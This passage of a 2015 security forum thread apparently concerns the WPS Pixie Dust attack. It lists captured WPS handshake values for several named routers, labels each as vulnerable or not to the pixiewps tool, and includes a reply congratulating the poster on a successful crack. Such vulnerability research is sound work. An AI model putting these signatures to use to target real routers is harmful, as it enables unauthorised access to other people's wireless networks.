    [P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb:68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e:f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6:bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:db:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7:82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3:7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:53:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb:a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e:18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:df:38:d1:2b:71:d4:3e:3e:cc
    [P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6:65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
    [P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3:19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
    [P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b:f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94
    NOT VULNERABLE:

    Code:
    NETGEAR WN3100RP (WiFi-Repeater)
    
    [P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
    [P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44:67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6:be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f:d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53:95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3:03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c:2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31:90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:ad:38:01:14:79:2d:bb:6e:90
    [P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71:a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:09:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04:b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37:48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:ef:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b:7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee:1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:18:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74:0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc:47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:60:60:96:dc:d0:a2:10:f9:71
    [P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8:76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
    [P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90:08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
    [P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61:a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79
    Code:
    VULNERABLE:
    
    NETGEAR JNR3210
    Realtek RTL8198
    
    [P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc:56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:bb:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe:ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f:75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:22:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f:04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96:c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:65:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80:13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09:51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:ff:87:81:59:02:97:0f:f3:0d
    [P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17:a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
    [P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb:0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
    [P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6:a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73
    Last edited by someone_else; 2015-04-20 at 08:55. Reason: Failure in Model-Number

  50. #250
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by someone_else View Post
    Some new Signatures (tested with all 4 possible pixiewps option-combinations)

    NOT VULNERABLE:

    Code:
    ASUS RT-N66U
    Broadcom BCM4706
    
    [P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
    [P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86:c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48:01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5:78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:ab:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78:17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18:97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5:07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b:2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4d:47:4a:b2:59:6a:3e:43:9b
    [P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb:68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e:f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6:bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:db:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7:82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3:7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:53:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb:a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e:18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:df:38:d1:2b:71:d4:3e:3e:cc
    [P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6:65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
    [P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3:19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
    [P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b:f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94
    NOT VULNERABLE:

    Code:
    NETGEAR WN3100RP (WiFi-Repeater)
    
    [P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
    [P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44:67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6:be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f:d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53:95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3:03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c:2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31:90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:ad:38:01:14:79:2d:bb:6e:90
    [P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71:a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:09:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04:b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37:48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:ef:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b:7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee:1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:18:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74:0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc:47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:60:60:96:dc:d0:a2:10:f9:71
    [P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8:76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
    [P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90:08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
    [P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61:a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79
    Code:
    VULNERABLE:
    
    NETGEAR JNR3210
    Realtek RTL8198
    
    [P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc:56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:bb:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe:ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f:75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:22:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f:04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96:c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:65:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80:13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09:51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:ff:87:81:59:02:97:0f:f3:0d
    [P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17:a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
    [P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb:0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
    [P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6:a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73
    Sweet thanks! I see you found Realtek AP and had success!! Congrats!

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32
  3. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •